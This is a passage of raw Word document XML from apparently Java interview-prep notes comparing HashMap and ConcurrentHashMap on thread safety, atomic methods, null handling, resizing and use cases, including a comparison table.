          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This restriction is intentional to avoid ambiguity, as null could be interpreted as the absence of a value or an indicator of a failed operation (e.g., putIfAbsent() returning null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D05C0C" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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5. Method Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6804B6" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789977A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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hMap supports basic methods like put(), get(), remove(), containsKey(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54850999" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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you need to perform compound actions like inserting or updating a value conditionally, you'll need to handle synchronization manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE0A1A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116640EB" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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oncurrentHashMap provides several </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atomic methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow thread-safe operations without external synchronization. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD53710" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8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tIfAbsent(key, value): Adds the key-value pair only if the key is absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE236E" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8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place(key, oldValue, newValue): Replaces the value only if it is currently associated with the specified old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391D26F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8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uteIfAbsent(key, mappingFunction): Computes the value for the key if it is absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42AAE3" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8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erge(key, value, remappingFunction): Merges the value if the key exists or inserts a new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A2C582" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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se methods provide better concurrency and are designed to avoid locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FD1D7" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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Resizing (Rehashing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1CEC4" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F860EBE" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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izes (rehashes)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the number of entries exceeds the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default is 0.75) multiplied by the current capacity. During resizing, the entire map is locked for rehashing, which can be expensive in multi-threaded scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F06B30" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CD3F2" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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izes in a thread-safe manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Rehashing does not require locking the entire map, and it allows concurrent operations while the resizing happens. It handles rehashing more efficiently by maintaining smaller sections of the map independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6BDE01" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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7. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130A634" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0264EA91" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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st suited for single-threaded environments or when external synchronization is already handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74876FB3" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal when thread safety is not a concern, and performance is a priority in non-concurrent contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD51A9F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6B023B" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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st suited for multi-threaded environments where high concurrency is required, and thread safety needs to be maintained without using synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20415B51" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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deal for scenarios like concurrent caching, parallel data processing, or shared data in a multi-threaded application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658E9A7" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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 of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00"/>
        <w:gridCol w:w="3323"/>
        <w:gridCol w:w="5081"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="373201BD" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C085A20" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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077648C8" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD2DB40" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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urrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="16622499" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1479812F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="145DB388" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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t thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69BD1882" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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read-safe, designed for concurrent access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="3D8AFA71" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E22AE3D" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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cking Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23833DE4" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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built-in locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CEA2499" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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ne-grained locking (segment or bucket-level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="3BE280D6" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B69A71" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="534FAF46" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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aster for single-threaded usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3304028C" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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light overhead due to thread-safety but better concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="59593092" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B75729F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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ull Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63BB38A4" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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lows one null key, multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2078E796" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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oes not allow null keys/values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="6E067A79" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DA92B07" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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tomic Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE48B26" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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atomic operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73BB2850" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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pports atomic operations like putIfAbsent(), replace(), etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="74DF0C2B" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09956614" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4379B2F4" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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gle-threaded or external sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ED3227E" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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ulti-threaded, high-concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92DCB" w:rsidRPr="00CE4B95" w14:paraId="431D1E61" w14:textId="77777777" w:rsidTr="00B43006">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE2CA01" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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izing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="366C4FEC" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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sizes with full locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7442D61D" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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sizes without locking the entire map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F235537" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92D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198900FD" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88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 </w:t>
      </w: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when you don't need thread safety, and you need optimal performance in single-threaded scenarios or when managing synchronization manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7B3DD" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92DCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need thread-safe operations and high concurrency, particularly in multi-threaded applications where the map is accessed and modified concurrently by many threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A69E9" w14:textId="7B3E440D"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E778BE2">
          <v:rect id="_x0000_i1587" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFA185D" w14:textId="77777777" w:rsidR="00ED664A" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED664A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc196307674"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How is HashMap faster as compared to ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w14:paraId="71DB3289" w14:textId="7A049448" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">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is generally </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster than ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in single-threaded scenarios due to its simpler design and lack of synchronization overhead. Here's a detailed explanation of why HashMap is faster in comparison to ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E9AC0" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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Lack of Synchronization in HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3574B" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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does not provide thread-safety, which means it doesn't have to manage synchronization between threads. It performs basic operations like put(), get(), and remove() directly without any locking or atomic operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968C425" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ce there's no overhead of managing thread safety, the operations on HashMap are executed more quickly in a single-threaded context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2339940A" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA314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contrast:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F0F9E1" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00DA3149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses mechanisms like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</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bucket-level lock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atomic operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
